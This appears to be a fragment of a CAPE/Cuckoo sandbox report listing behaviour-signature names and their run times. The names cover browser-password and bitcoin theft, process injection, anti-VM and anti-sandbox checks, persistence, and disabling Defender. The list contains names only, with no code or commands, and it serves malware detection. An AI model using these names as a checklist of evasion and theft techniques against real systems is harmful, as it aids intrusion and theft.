  • 0.008 infostealer_browser_password
  • 0.008 kovter_behavior
  • 0.008 hancitor_behavior
  • 0.008 browser_security
  • 0.008 infostealer_bitcoin
  • 0.007 injection_runpe
  • 0.007 InjectionProcessHollowing
  • 0.006 exploit_getbasekerneladdress
  • 0.006 dridex_behavior
  • 0.006 EvilGrab
  • 0.006 antivm_hyperv_keys
  • 0.006 disables_browser_warn
  • 0.006 packer_armadillo_regkey
  • 0.006 remcos_regkeys
  • 0.005 InjectionInterProcess
  • 0.005 infostealer_browser
  • 0.005 exploit_gethaldispatchtable
  • 0.005 antivm_xen_keys
  • 0.005 bypass_firewall
  • 0.004 antivm_vbox_libs
  • 0.004 exploit_heapspray
  • 0.004 stack_pivot
  • 0.004 RegBinary
  • 0.004 antisandbox_sleep
  • 0.004 shifu_behavior
  • 0.004 Raccoon Behavior
  • 0.004 antivm_generic_bios
  • 0.004 antivm_generic_cpu
  • 0.004 antivm_generic_system
  • 0.004 antivm_vbox_files
  • 0.004 ransomware_extensions
  • 0.003 persistence_registry_script
  • 0.003 antidebug_guardpages
  • 0.003 antiav_avast_libs
  • 0.003 persistence_bootexecute
  • 0.003 Sodinokibi Behavior
  • 0.003 modifies_desktop_wallpaper
  • 0.003 PlugX
  • 0.003 persistence_autorun_tasks
  • 0.003 browser_addon
  • 0.003 modify_proxy
  • 0.002 tinba_behavior
  • 0.002 banker_prinimalka
  • 0.002 hawkeye_behavior
  • 0.002 gootkit_behavior
  • 0.002 Vidar Behavior
  • 0.002 creates_largekey
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 antisandbox_sboxie_libs
  • 0.002 ipc_namedpipe
  • 0.002 exec_crash
  • 0.002 InjectionSetWindowLong
  • 0.002 cerber_behavior
  • 0.002 antianalysis_detectfile
  • 0.002 antidbg_devices
  • 0.002 disables_system_restore
  • 0.002 disables_windows_defender
  • 0.002 office_martian_children
  • 0.002 modify_security_center_warnings
  • 0.002 stealth_hiddenreg
  • 0.001 stack_pivot_file_created
  • 0.001 network_tor
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 rat_luminosity
  • 0.001 antivm_vmware_libs
  • 0.001 injection_explorer
  • 0.001 neshta_regkeys
  • 0.001 ransomware_message
  • 0.001 ursnif_behavior
  • 0.001 neshta_files
  • 0.001 antiav_bitdefender_libs
  • 0.001 securityxploded_modules
  • 0.001 antiemu_wine_reg
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vmware_files
  • 0.001 bot_drive
  • 0.001 modify_uac_prompt
  • 0.001 persistence_shim_database
  • 0.001 ransomware_radamant
  • 0.001 rat_pcclient
  • 0.001 rat_spynet
  • 0.001 stealth_hide_notifications

Reporting ( 0.057 seconds )

  • 0.057 CompressResults
Task ID 94396
Mongo ID 5d9e78dfc3c009112d67cf9a
Cuckoo release 1.3-CAPE